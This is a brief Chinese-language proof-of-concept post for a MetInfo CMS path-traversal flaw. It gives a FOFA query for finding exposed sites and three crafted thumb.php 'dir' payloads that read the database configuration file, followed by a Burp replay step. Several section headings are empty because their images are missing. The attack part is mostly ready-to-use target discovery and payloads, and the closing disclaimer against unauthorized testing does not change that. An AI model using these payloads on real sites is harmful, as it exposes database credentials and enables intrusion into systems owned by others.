1.fofa语法:
app="metinfo"
图标:
资产:
2.poc:
拼接url:
/include/thumb.php?dir=..././http/..././config/config_db.php
/include/thumb.php?dir=.....///http/.....///config/config_db.php
/include/thumb.php?dir=http/.....///.....///config/config_db.php
如果回显页面是这样的话使用bp进行重放处理,即可读取数据库配置文件:
3.bp抓取验证:
脱敏处理:
证明漏洞存在即可,不要做任何破坏。
声明:此篇文章只做技术分享,提供读者学习与交流,禁止做非法未授权渗透测试!